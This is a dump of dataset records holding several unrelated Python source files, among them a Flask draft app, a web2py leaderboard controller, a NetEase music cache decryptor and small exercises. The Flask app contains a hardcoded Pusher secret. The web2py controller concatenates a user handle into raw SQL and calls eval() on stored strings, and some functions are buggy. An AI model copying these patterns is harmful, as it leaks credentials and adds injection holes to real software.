start_time\r\n","sub_path":"src/formulators.py","file_name":"formulators.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"39963559","text":"import math\r\n\r\ndef funkcjaKwadratowa(a, b, c):\r\n file = open(\"result.txt\", \"a\")\r\n file.write(\"a = \" + str(a) + \", b = \" + str(b) + \", c = \" + str(c) + \"\\n\")\r\n\r\n delta = b**2 - 4*a*c\r\n if delta > 0:\r\n x1 = (-b - math.sqrt(delta))/(2*a)\r\n x2 = (-b + math.sqrt(delta))/(2*a)\r\n file.write(\"Two results: \" + str(x1) + \" \" + str(x2) + \"\\n\\n\")\r\n\r\n elif delta == 0:\r\n x0 = -b/(2*a)\r\n file.write(\"One result: \" + str(x0) + \"\\n\\n\")\r\n\r\n else:\r\n file.write(\"No results\\n\\n\")\r\n\r\n file.close()\r\n\r\na = int(input(\"Podaj a: \"))\r\nb = int(input(\"Podaj b: \"))\r\nc = int(input(\"Podaj c: \"))\r\nfunkcjaKwadratowa(a, b, c)\r\n","sub_path":"lab2/zad7.py","file_name":"zad7.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210197871","text":"\n\n#calss header\nclass _FROGMAN():\n\tdef __init__(self,): \n\t\tself.name = \"FROGMAN\"\n\t\tself.definitions = [u'someone who swims or works underwater for a long time wearing breathing equipment, flippers (= rubber or plastic shoes that are longer than the feet), and usually a rubber suit: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_frogman.py","file_name":"_frogman.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"217672875","text":"from flask import Flask, jsonify, request, render_template, redirect\nimport os\nimport requests\nimport json\nimport pusher\nfrom database import db_session\nfrom models import Draft\n\napp = Flask(__name__)\n\npusher_client = pusher.Pusher(\n app_id='628052',\n key='2c712e9027d8604455b8',\n secret='a7e5e6f8846b3620a7b0',\n cluster='us2',\n ssl=True)\n\n# Lines 18-20 are how the routes should look connected to the API\n# @app.route('/some-url')\n# def get_data():\n# return requests.get('http://localhost:1234/api/players').content\n\n@app.route('/')\ndef start():\n # players = Draft.query.all()\n # return render_template('index.html', players=players)\n return render_template('start.html')\n\n@app.route('/index')\ndef index():\n players = Draft.query.all()\n return render_template('index.html', players=players)\n\n@app.route('/backend', methods=[\"POST\", \"GET\"])\ndef backend():\n if request.method == \"POST\":\n player = request.form[\"player\"]\n team = request.form[\"team\"]\n new_player = Draft(player, team)\n db_session.add(new_player)\n db_session.commit()\n\n data = {\n \"id\": new_player.id,\n \"player\": player\n }\n\n pusher_client.trigger('table', 'new-record', {'data': data})\n\n return redirect(\"/backend\", code=302)\n else:\n players = Draft.query.all()\n return render_template('backend.html', players=players)\n\n@app.route('/edit/', methods=[\"POST\", \"GET\"])\ndef update_record(id):\n if request.method == \"POST\":\n player = request.form[\"player\"]\n team = request.form[\"team\"]\n\n update_player = Draft.query.get(id)\n update_player.player = player\n update_player.team = team\n db_session.commit()\n\n data = {\n \"id\": id,\n \"player\": player,\n \"team\": team\n }\n\n pusher_client.trigger('table', 'update-record', {'data': data})\n\n return redirect(\"/backend\", code=302)\n else:\n new_player = Draft.query.get(id)\n\n return render_template('update_player.html', data=new_player)\n\n@app.route('/delete/', methods=[\"DELETE\"])\ndef delete_record(id):\n delPlayer= [ player for player in Draft if player['id'] == id]\n Draft.remove(delPlayer[0])\n db_session.commit()\n\n data = {\n \"id\": id,\n \"player\": player,\n \"team\": team\n }\n\n pusher_client.trigger('table', 'delete-record', {'data': data})\n\n return redirect(\"/backend\", code=302)\n\n\n# Code for Heroku Logging\n# class HerokuConfig(ProductionConfig):\n# @classmethod\n# def init_app(cls, app):\n# ProductionConfig.init_app(app)\n#\n# import logging\n# from logging import StreamHandler\n# file_handler = StreamHandler()\n# file_handler.setLevel(logging.WARNING)\n# app.logger.addHandler(file_handler)\n\n\n# @app.route('/jedi/', methods=['DELETE'])\n# def delete(name):\n# jed = [jedi for jedi in Jedi if jedi['name'] == name]\n# Jedi.remove(jed[0])\n# return jsonify({'Jedi' : Jedi})\n\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db_session.remove()\n\n# run Flask app\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"draftApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"21595878","text":"#!/usr/bin/python3\n\nimport argparse\n\n\"\"\"\nApplication Name\nby Olof Sjödin \n\nGPL v3\n\"\"\"\n\ndef main():\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument(\"--example\", dest=\"example\", action=\"store_true\")\n\n args = parser.parse_args()\n\n args.example\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python/terminal-app.py","file_name":"terminal-app.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"622468795","text":"\"\"\"\nGiven an encoded string, return it's decoded string.\n\nThe encoding rule is: k[encoded_string], where the encoded_string inside the square brackets\nis being repeated exactly k times. Note that k is guaranteed to be a positive integer.\n\nYou may assume that the input string is always valid; No extra white spaces, square brackets\nare well-formed, etc.\n\nFurthermore, you may assume that the original data does not contain any digits and that digits\nare only for those repeat numbers, k. For example, there won't be input like 3a or 2[4].\n\"\"\"\nclass Solution(object):\n def decodeString(self, s):\n stack = []\n n = 0\n res = ''\n for c in s:\n if c == '[':\n stack.append(res)\n stack.append(n)\n res = ''\n n = 0\n elif c == ']':\n repeat = stack.pop()\n prev = stack.pop()\n res = prev + repeat * res\n elif c.isdigit():\n n = n * 10 + int(c) # might more than 1 digit\n else:\n res += c\n return res\n\n def decodeString2(self, s):\n # Idea two stack, one for count, one for result till now\n res = ''\n cntStack = []\n resStack = []\n i = 0\n while i < len(s):\n if s[i].isdigit():\n cnt = 0\n while s[i].isdigit(): # get all the digits\n cnt = int(s[i])\n i += 1\n cntStack.append(cnt)\n elif s[i] == '[':\n resStack.append(res)\n res = ''\n i += 1\n elif s[i] == ']':\n tmp = resStack.pop()\n repeat = cntStack.pop()\n for _ in range(repeat):\n tmp += res\n res = tmp\n i += 1\n else:\n res += s[i]\n i += 1\n\n return res\n\n\n# s = \"3[a]2[bc]\"\n# s = \"3[a2[c]]\"\ns = \"2[abc]3[cd]ef\"\nprint(Solution().decodeString(s))","sub_path":"394DecodeStr.py","file_name":"394DecodeStr.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"377200014","text":"from WMCore.Configuration import Configuration\nfrom CRABClient.UserUtilities import config\n\nconfig = config()\n\nconfig.General.requestName = 'SingleMuPt200_2ndfull_2nd_step1'\nconfig.General.workArea = 'crab_projects_pt200_2ndfull_2nd_withPU'\nconfig.General.transferOutputs = True\nconfig.General.failureLimit=1\nconfig.General.transferLogs=True\n\nconfig.JobType.pluginName = 'PrivateMC'\nconfig.JobType.psetName = 'SingleMuPt200_2ndfull_2nd_GEN_SIM.py'\n\n#config.Data.outputPrimaryDataset = 'MinBias'\nconfig.Data.splitting = 'EventBased'\nconfig.Data.unitsPerJob = 100\nNJOBS = 5000 # This is not a configuration parameter, but an auxiliary variable that we use in the next line.\nconfig.Data.totalUnits = config.Data.unitsPerJob * NJOBS\nconfig.Data.publication = True\nconfig.Data.outputDatasetTag = 'SingleMuPt200_2ndfull_2nd_GEN-SIM_step1'\nconfig.Data.outputPrimaryDataset = 'SingleMuPt200_2ndfull_2nd_GEN-SIM_step1_neha'\nconfig.Site.storageSite = 'T2_US_Florida'\n","sub_path":"CRAB_SUBMISSION/Pt_200/crab_gen_200_2ndfull_2nd.py","file_name":"crab_gen_200_2ndfull_2nd.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300517790","text":"import utilities\nimport time\nfrom datetime import date\n\"\"\"\n @ToDo: Loads of cleanup :D\n\"\"\"\n\n# ----------------------------------------------------------------------------\ndef index():\n \"\"\"\n The main controller which redirects depending\n on the login status of the user and does some\n extra pre-processing\n \"\"\"\n\n # If the user is logged in\n if session[\"auth\"]:\n session[\"handle\"] = session[\"auth\"][\"user\"][\"stopstalk_handle\"]\n session[\"user_id\"] = session[\"auth\"][\"user\"][\"id\"]\n session.flash = \"Logged in successfully\"\n session.url_count = 0\n redirect(URL(\"default\", \"submissions\", args=[1]))\n\n # Detect a registration has taken place\n # This will be the case when submission on\n # a register user form is done.\n row = db(db.auth_event.id > 0).select().last()\n if row:\n desc = row.description\n else:\n desc = \"\"\n\n # If the last auth_event record contains registered\n # or verification then retrieve submissions\n if desc.__contains__(\"Registered\") or \\\n desc.__contains__(\"Verification\"):\n reg_user = desc.split(\" \")[1]\n r = db(db.friends.user_id == reg_user).select()\n utilities.retrieve_submissions(int(reg_user))\n\n # User has a `set` of friends' ids\n # If user does not exists then initialize it with empty set\n if len(r) == 0:\n db.friends.insert(user_id=int(reg_user),\n friends_list=str(set([])))\n\n response.flash = T(\"Please Login\")\n return dict()\n\n# ----------------------------------------------------------------------------\ndef get_max_streak(handle):\n \"\"\"\n Get the maximum of all streaks\n\n @Todo: There is some bug here\n \"\"\"\n\n # Build the complex SQL query\n sql_query = \"\"\"\n SELECT time_stamp, COUNT(*)\n FROM submission\n WHERE submission.stopstalk_handle=\n \"\"\"\n\n sql_query += \"'\" + handle + \"' \"\n sql_query += \"\"\"\n GROUP BY DATE(submission.time_stamp), submission.status;\n \"\"\"\n\n row = db.executesql(sql_query)\n\n streak = 0\n max_streak = 0\n prev = curr = start = None\n total_submissions = 0\n\n for i in row:\n\n total_submissions += i[1]\n if prev is None and streak == 0:\n prev = time.strptime(str(i[0]), \"%Y-%m-%d %H:%M:%S\")\n prev = date(prev.tm_year, prev.tm_mon, prev.tm_mday)\n streak = 1\n start = prev\n else:\n curr = time.strptime(str(i[0]), \"%Y-%m-%d %H:%M:%S\")\n curr = date(curr.tm_year, curr.tm_mon, curr.tm_mday)\n\n if (curr - prev).days == 1:\n streak += 1\n elif curr != prev:\n streak = 1\n\n prev = curr\n\n if streak > max_streak:\n max_streak = streak\n\n today = datetime.today().date()\n\n # There are no submissions in the database for this user\n if prev is None:\n return (0, 0, 0)\n\n # Check if the last streak is continued till today\n if (today - prev).days > 1:\n streak = 0\n\n return max_streak, total_submissions, streak\n\n# ----------------------------------------------------------------------------\n@auth.requires_login()\ndef notifications():\n \"\"\"\n Check if any of the friends(includes CUSTOM) of\n the logged-in user is on a streak\n \"\"\"\n\n if session[\"user_id\"] is None:\n redirect(URL(\"default\", \"index\"))\n\n ftable = db.friends\n atable = db.auth_user\n ctable = db.custom_friend\n\n # Check for streak of friends on stopstalk\n query = (ftable.user_id == session[\"user_id\"])\n row = db(query).select(ftable.friends_list).first()\n\n # Will contain list of handles of all the friends along\n # with the Custom Users added by the logged-in user\n handles = []\n\n for user in eval(row.friends_list):\n query = (atable.id == user)\n user_data = db(query).select(atable.first_name,\n atable.last_name,\n atable.stopstalk_handle).first()\n\n handles.append((user_data.stopstalk_handle,\n user_data.first_name + \" \" + user_data.last_name))\n\n # Check for streak of custom friends\n query = (ctable.user_id == session[\"user_id\"])\n rows = db(query).select(ctable.first_name,\n ctable.last_name,\n ctable.stopstalk_handle)\n for user in rows:\n handles.append((user.stopstalk_handle,\n user.first_name + \" \" + user.last_name))\n\n # List of users with non-zero streak\n users_on_streak = []\n\n for handle in handles:\n max_streak, total_submissions, curr_streak = get_max_streak(handle[0])\n\n # If streak is non-zero append to users_on_streak list\n if curr_streak:\n users_on_streak.append((handle, curr_streak))\n\n # Sort the users on streak by their streak\n users_on_streak.sort(key=lambda k: k[1], reverse=True)\n\n # The table containing users on streak\n table = TABLE(TR(TH(H3(STRONG(\"User\"))),\n TH(H3(STRONG(\"Streak\"),\n _class=\"center\"))),\n _class=\"table\")\n\n # Append all the users to the final table\n for users in users_on_streak:\n handle = users[0]\n curr_streak = users[1]\n tr = TR(TD(H3(A(handle[1],\n _href=URL(\"user\", \"profile\", args=[handle[0]])))),\n TD(H3(str(curr_streak) + \" \",\n I(_class=\"fa fa-bolt\",\n _style=\"color:red\"),\n _class=\"center\",\n )))\n table.append(tr)\n\n return dict(table=table)\n\n# ----------------------------------------------------------------------------\ndef compute_row(user, custom=False):\n \"\"\"\n Computes rating and retrieves other\n information of the specified user\n \"\"\"\n\n max_streak, total_submissions, curr_streak = get_max_streak(user.stopstalk_handle)\n\n if total_submissions == 0:\n return ()\n\n stable = db.submission\n\n # Find the total solved problems(Lesser than total accepted)\n query = (stable.stopstalk_handle == user.stopstalk_handle)\n query &= (stable.status == \"AC\")\n accepted = db(query).select(stable.problem_name, distinct=True)\n accepted = len(accepted)\n\n # Unique rating formula\n # @ToDo: Improvement is always better\n rating = max_streak * 10 + \\\n accepted * 50 + \\\n (accepted * 100.0 / total_submissions) * 80 + \\\n (total_submissions - accepted) * 15\n rating = int(rating)\n\n table = db.auth_user\n if custom:\n table = db.custom_friend\n\n # Update the rating whenever leaderboard page is loaded\n db(table.stopstalk_handle == user.stopstalk_handle).update(rating=rating)\n\n return (user.first_name + \" \" + user.last_name,\n user.stopstalk_handle,\n user.institute,\n rating)\n\n# ----------------------------------------------------------------------------\ndef leaderboard():\n \"\"\"\n Get a table with users sorted by rating\n \"\"\"\n\n reg_users = db(db.auth_user.id > 0).select()\n custom_users = db(db.custom_friend.id > 0).select()\n\n users = []\n\n for user in reg_users:\n tup = compute_row(user)\n if tup is not ():\n users.append(tup)\n\n for user in custom_users:\n tup = compute_row(user, True)\n if tup is not ():\n users.append(tup)\n\n # Sort users according to the rating\n users = sorted(users, key=lambda x: x[3], reverse=True)\n\n table = TABLE(_class=\"table\")\n table.append(TR(TH(\"Name\"),\n TH(\"StopStalk Handle\"),\n TH(\"Institute\"),\n TH(\"StopStalk Rating\")))\n\n for i in users:\n\n # If there are no submissions of the user in the database\n if i is ():\n continue\n\n tr = TR()\n tr.append(TD(i[0]))\n tr.append(TD(A(i[1],\n _href=URL(\"user\", \"profile\", args=[i[1]]))))\n tr.append(TD(i[2]))\n tr.append(TD(i[3]))\n table.append(tr)\n\n return dict(table=table)\n\n# ----------------------------------------------------------------------------\ndef user():\n \"\"\"\n Use the standard auth for user\n \"\"\"\n return dict(form=auth())\n\n# ----------------------------------------------------------------------------\n@auth.requires_login()\ndef search():\n return dict()\n\n# ----------------------------------------------------------------------------\n@auth.requires_login()\ndef mark_friend():\n \"\"\"\n Send a friend request\n \"\"\"\n\n if len(request.args) < 1:\n session.flash = \"Friend Request sent\"\n redirect(URL(\"default\", \"search\"))\n\n # Insert a tuple of users' id into the friend_requests table\n db.friend_requests.insert(from_h=session.user_id, to_h=request.args[0])\n session.flash = \"Friend Request sent\"\n redirect(URL(\"default\", \"search.html\"))\n return dict()\n\n# ----------------------------------------------------------------------------\n@auth.requires_login()\ndef retrieve_users():\n \"\"\"\n Show the list of registered users\n \"\"\"\n\n atable = db.auth_user\n frtable = db.friend_requests\n q = request.get_vars.get(\"q\", None)\n\n query = (atable.first_name.like(\"%\" + q + \"%\",\n case_sensitive=False))\n query |= (atable.last_name.like(\"%\" + q + \"%\",\n case_sensitive=False))\n query |= (atable.stopstalk_handle.like(\"%\" + q + \"%\",\n case_sensitive=False))\n\n for site in current.SITES:\n field_name = site.lower() + \"_handle\"\n query |= (atable[field_name].like(\"%\" + q + \"%\",\n case_sensitive=False))\n\n # Don't show the logged in user in the search\n query &= (atable.id != session.user_id)\n\n # Don't show users who have sent friend requests\n # to the logged in user\n tmprows = db(frtable.from_h != session.user_id).select(frtable.from_h)\n for row in tmprows:\n query &= (atable.id != row.from_h)\n\n rows = db(query).select()\n\n t = TABLE(_class=\"table\")\n tr = TR(TH(\"Name\"),\n TH(\"StopStalk Handle\"))\n\n for site in current.SITES:\n tr.append(TH(site + \" Handle\"))\n\n tr.append(TH(\"Friendship Status\"))\n t.append(tr)\n\n for user in rows:\n\n friends = db(db.friends.user_id == user.id).select().first()\n friends = eval(friends.friends_list)\n tr = TR()\n tr.append(TD(user.first_name + \" \" + user.last_name))\n tr.append(TD(user.stopstalk_handle))\n\n for site in current.SITES:\n tr.append(TD(user[site.lower() + \"_handle\"]))\n\n # Check if the current user is already a friend or not\n if session.user_id not in friends:\n r = db((frtable.from_h == session.user_id) &\n (frtable.to_h == user.id)).select()\n if len(r) == 0:\n tr.append(TD(FORM(INPUT(_type=\"submit\",\n _value=\"Add Friend\",\n _class=\"btn btn-warning\"),\n _action=URL(\"default\", \"mark_friend\",\n args=[user.id]))))\n else:\n tr.append(TD(\"Friend request sent\"))\n else:\n tr.append(TD(\"Already friends\"))\n t.append(tr)\n\n return dict(t=t)\n\n# ----------------------------------------------------------------------------\n@auth.requires_login()\ndef submissions():\n \"\"\"\n Retrieve submissions of the logged-in user\n \"\"\"\n\n if len(request.args) == 0:\n active = \"1\"\n else:\n active = request.args[0]\n\n # Retrieve all the custom users created by the logged-in user\n query = (db.custom_friend.user_id == session.user_id)\n custom_friends = db(query).select(db.custom_friend.id)\n\n cusfriends = []\n for friend in custom_friends:\n cusfriends.append(friend.id)\n\n # Get the friends of logged in user\n query = (db.friends.user_id == session.user_id)\n friends = db(query).select(db.friends.friends_list).first()\n friends = tuple(eval(friends.friends_list))\n\n query = (db.submission.user_id.belongs(friends))\n query |= (db.submission.custom_user_id.belongs(cusfriends))\n count = db(query).count()\n count = count / 100 + 1\n\n if request.extension == \"json\":\n return dict(count=count)\n\n # Retrieve user submissions only on page 1\n if active == \"1\":\n for i in friends:\n utilities.retrieve_submissions(i)\n\n for i in cusfriends:\n utilities.retrieve_submissions(i, custom=True)\n\n offset = 100 * (int(active) - 1)\n # Retrieve only 100 submissions from the offset\n rows = db(query).select(orderby=~db.submission.time_stamp,\n limitby=(offset, offset + 100))\n\n table = utilities.render_table(rows)\n return dict(table=table)\n\n# ----------------------------------------------------------------------------\ndef call():\n \"\"\"\n exposes services. for example:\n http://..../[app]/default/call/jsonrpc\n decorate with @services.jsonrpc the functions to expose\n supports xml, json, xmlrpc, jsonrpc, amfrpc, rss, csv\n \"\"\"\n return service()\n","sub_path":"controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":13445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"529430563","text":"import random\n\n\ntimes = [\"утром\", \"днём\", \"вечером\", \"ночью\", \"после обеда\", \"перед сном\"]\nadvices = [\"ожидайте\", \"предостерегайтесь\", \"будьте открыты для\"]\npromises = [\"гостей из забытого прошлого\",\n\t\t\t\"встреч со старыми знакомыми\",\n\t\t\t\"неожиданного праздника\",\n\t\t\t\"приятных перемен\"]\n\ngenerated_prophecies = []\n\ni = 0\nwhile i < 5:\n\tj = 0\n\tprediction = []\n\n\twhile j < 3:\n\t\tpr_times =random.randrange(0,len(times))\n\t\tpr_advices =random.randrange(0,len(advices))\n\t\tpr_promises =random.randrange(0,len(promises))\n\n\t\tp1 =str(times[pr_times]).capitalize()\n\t\tp2 =str(advices[pr_advices])\n\t\tp3 =str(promises[pr_promises])\n\n\t\tprediction = (p1,\"\" + p2,\"\"+p3,\".\")\n\t\tj = j+1\n\n\t\tgenerated_prophecies.append(prediction)\n\n\t\ti = i + 1\n\nprint(generated_prophecies)","sub_path":"М1/horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"585310054","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('myblog', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Navbar',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=30, verbose_name='\\u540d\\u79f0')),\n ('url', models.CharField(max_length=100, null=True, verbose_name='Url')),\n ('blank', models.CharField(max_length=20, verbose_name='\\u6253\\u5f00\\u5c5e\\u6027')),\n ('ordernum', models.IntegerField(default=0, verbose_name='\\u6392\\u5e8f')),\n ('parent', models.ForeignKey(blank=True, to='myblog.Navbar', null=True)),\n ],\n options={\n 'verbose_name': '\\u5bfc\\u822a',\n 'verbose_name_plural': '\\u5bfc\\u822a',\n },\n ),\n ]\n","sub_path":"mydjango/myblog/migrations/0002_navbar.py","file_name":"0002_navbar.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"320574274","text":"# -*- coding: utf-8 -*-\n# @author Masakaze Sato\n# @file TestSearchWeb.py\n# @note ウェブ探索のテスト\n\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\n\nfrom Component.ActionComponentLookWebPage import ActionComponentLookWebPage\nfrom Component import BodyComponentPCVirtual\nfrom Component.ComponentArgFeatureImage import ComponentArgFeatureImage\nfrom Component.ComponentArgLookWebPage import ComponentArgLookWebPage\nfrom Component.ComponentArgStimulusLook import ComponentArgStimulusLook\n\nif __name__ == \"__main__\":\n # Bodyに視覚刺激\n body = BodyComponentPCVirtual.BodyComponentPCVirtual()\n body.enable()\n\n image_file = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"EyeSensor\", \"SampleImage\", \"Apple.jpg\")\n look_arg = ComponentArgStimulusLook(image_file)\n body.try_stimulate(look_arg)\n\n for i in range(2):\n features = []\n cnt = 0\n while len(features) == 0:\n print(\"\\rLoopWait for pop_features:\" + str(cnt), end=\"\")\n features = body.pop_features([ComponentArgFeatureImage.ARG_TYPE])\n cnt += 1\n\n # image_fileからDesireComponent更新\n\n # DesireComponentからurlを生成\n\n # LookPageAction\n action = ActionComponentLookWebPage(body)\n action.execute([ComponentArgLookWebPage(\"https://ja.wikipedia.org/wiki/%E3%83%AA%E3%83%B3%E3%82%B4\")])\n # for \n body.disable()\n","sub_path":"AI/ComponentConnectTest/TestSearchWeb.py","file_name":"TestSearchWeb.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"369220510","text":"from mutagen.easyid3 import EasyID3\r\nfrom mutagen.mp3 import MP3\r\nfrom itertools import zip_longest\r\nfrom collections import Iterable\r\nfrom lxml import etree\r\nfrom operator import or_\r\nimport sys\r\nimport requests \r\nimport json\r\nimport glob\r\nimport re\r\nimport os\r\n\r\n\r\nclass netEaseMusic:\r\n def __init__(self,path=''):\r\n if path == '':path = input('input the path of cached netease_music')\r\n self.path = path\r\n os.chdir(path)\r\n self.names=glob.glob('*.uc!')\r\n self.id_mp = {}\r\n for i in self.names:self.id_mp[self.getId(i)] = i\r\n self.absPaths=[os.path.abspath(i) for i in self.names]\r\n self.prep()\r\n self.headers={\r\n 'Referer':'http://music.163.com/',\r\n 'Host':'music.163.com',\r\n 'Connection':'keep-alive',\r\n 'User-Agent': 'ozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'\r\n }\r\n self.nameXpath ='//div[@class=\"tit\"]/em[@class=\"f-ff2\"]/text()'\r\n self.lrcSentencePt=re.compile(r'\\[\\d+:\\d+.\\d+\\]([\\w\\d]+)\\\\n') # wrong (r'\\[\\d+,\\d+\\](\\(\\d+,\\d+\\)(\\w))+\\n')\r\n self.hasLrcPt= re.compile(r'(lyric|lrc|klyric|kalaokLyric|tlyric)\\s*[\\'\\\"]:\\s*[\\'\\\"]\\s*\\[')\r\n self.lrcKey = li = 'lyric|lrc|klyric|kalaokLyric|tlyric'.split('|')\r\n def prep(self): \r\n self.prt= os.path.dirname(os.getcwd())\r\n self.cd('cached_网易云音乐')\r\n self.cd('cached_网易云音乐/lyric')\r\n self.cd('cached_网易云音乐/music')\r\n \r\n def cd(self,s):\r\n '''cd to the dir path+s, (create it first if not exists)'''\r\n try:\r\n os.chdir(self.prt)\r\n os.chdir(s)\r\n except:\r\n os.mkdir(s)\r\n os.chdir(s)\r\n \r\n def getId(self,name):\r\n if name[-1] not in '0987654321':\r\n name = os.path.basename(name)\r\n return name[:name.find('-')]\r\n def getIdFromIdx(self,idxFileName):\r\n with open(idxFileName,'r') as f:\r\n try:\r\n info = json.load(f) # r'\\\"musicId\\\":(\\d+)'\r\n except:\r\n raise Exception('file {} is breaken'.format(idxFileName))\r\n return info['musicId']\r\n def crawlName(self,musicId):\r\n url = 'https://music.163.com/#/song?id='+str(musicId)\r\n r= requests.get(url,headers = self.headers)\r\n if r.status_code !=200:\r\n print(r.status_code)\r\n raise Exception('crawl Name Failed! Bad Responde from '+url)\r\n sl = etree.HTML(r.text)\r\n try:\r\n return sl.xpath(self.nameXpath)[0]\r\n except:\r\n raise Exception('not find music name of id : '+str(musicId))\r\n def crawlLrc(self,musicId):\r\n url = ('http://music.163.com/api/song/lyric?id=' + str(musicId) + '&lv=1&kv=1&tv=-1')\r\n try:\r\n return requests.get(url).text\r\n except:\r\n raise Exception('crawl lyric Failed! Bad Responde from '+url)\r\n def lrcFromFile(self,musicId):\r\n self.cd('Lyric')\r\n ### 而直接字符串操作路径可能出错\r\n with open(str(musicId),'r',errors = 'ignore') as f: \r\n try:\r\n s=''\r\n d=json.load(f,encoding='utf8')\r\n if self.noLrc(d):return ''\r\n else:\r\n for i in self.lrcKey:\r\n if i in d and d[i]!='':s+= d[i]\r\n except:pass\r\n finally:return s\r\n def noLrc(self,s):\r\n '''judge if a dict or a string has lyrics'''\r\n if isinstance(s,str):\r\n return self.hasLrcPt.search(s) is None\r\n else:\r\n return not reduce(or_,[i in s and s[i]!='' for i in self.lrcKey]) \r\n def getLyric(self,musicId):\r\n lrc = self.lrcFromFile(musicId)\r\n name = self.id_mp[musicId]\r\n if lrc =='':\r\n try:\r\n lrc = self.crawlLrc(musicId)\r\n except:\r\n print('fail to get lyric of music '+name)\r\n return \r\n lrc_lst = self.lrcSentencePt.findall(lrc)\r\n if lrc_lst==[]:return\r\n self.cd('cached_网易云音乐/lyric')\r\n with open(name +'.txt','w') as f:\r\n f.write(name+'\\n\\n')\r\n f.write('\\n'.join(lrc_lst))\r\n return lrc_lst\r\n def getInfo(self,musicId):\r\n try:return self.getInfoFromMp3(musicId)\r\n except:\r\n try:\r\n with open(self.id_mp[musicId][:-3]+'idx') as f:\r\n s = f.read()\r\n name = re.findall(r'\\[ti:(.*?)\\]',s)[0]\r\n singer = re.findall(r'\\[ar:(.*?)\\]',lrc)[0]\r\n return {'artist':singer,'title':name}\r\n except:return {}\r\n \r\n def getInfoFromMp3(self,musicPath):\r\n tag = MP3(musicPath,ID3 = EasyID3)\r\n return dict(tag)\r\n def _genFileName(self,dic):\r\n tmp = ''\r\n if 'title' in dic: tmp = '-'.join(dic['title'])\r\n if 'artist' in dic: tmp+='--'+'-'.join(dic['artist'])\r\n if tmp =='--':\r\n try:tmp = self.crawlName()\r\n except Exception as e:\r\n print(repr(e))\r\n tmp = 'netease-music-'+musicId\r\n return tmp\r\n def decrypt(self,fileName):\r\n with open (fileName,'rb') as f:\r\n btay = bytearray(f.read())\r\n musicId = self.getId(fileName)\r\n self.cd('cached_网易云音乐/music')\r\n with open(str(musicId),'wb') as out:\r\n for i,j in enumerate(btay):\r\n btay[i] = j ^ 0xa3\r\n out.write(bytes(btay))\r\n dic = self.getInfo(musicId)\r\n newName = self.id_mp[musicId] = self._genFileName(dic)\r\n if newName == '':newName = musicId\r\n try:os.rename(musicId,newName+'.mp3')\r\n except:pass\r\n return musicId\r\n def getMusic(self):\r\n for i in self.absPaths:\r\n musicId = self.decrypt(i)\r\n self.getLyric(musicId)\r\n\r\n\r\n\r\npath = sys.argv[1:][0].strip()\r\n#path = 'C:\\\\Users\\\\mbinary\\\\Desktop\\\\source\\\\myscripts\\\\Music1'\r\nhd = netEaseMusic(path)\r\nhd.getMusic()\r\n","sub_path":"src/netease-music_v0.py","file_name":"netease-music_v0.py","file_ext":"py","file_size_in_byte":6228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"215853732","text":"import re\nimport sys\nimport inspect\nimport numpy as nu\nfrom numpy import array\nfrom astrometry.util import pyfits_utils as fu\nimport pyfits\nimport galpy.util.bovy_plot as plot\nfrom matplotlib import pyplot\nfrom gp.eval_gp import *\nfrom gp.trainGP import marginalLikelihood, pack_params\n\ndef mean(x,params):\n return 0\n\ndef covar(x,y,params):\n \"\"\"covar: covariance function\"\"\"\n return params.evaluate(x,y)\n\ndef dualBandExample(filename='../data/SDSSJ203817.37+003029.8.fits',\n constraints=None,basefilename='SDSSJ203817.37+003029.8',\n covarType='SF'):\n \"\"\"\n NAME:\n dualBandExample\n PURPOSE:\n show an example of a power-law structure function GP covariance function\n fit to an SDSS quasar for g and r\n INPUT:\n filename - filename with the data\n constraints - if None, use all constraints, if [] use no constraints!\n basefilename - basefilename for plots\n covarType - 'SF' or 'DRW'\n OUTPUT:\n writes several plots\n HISTORY:\n 2010-08-11 - 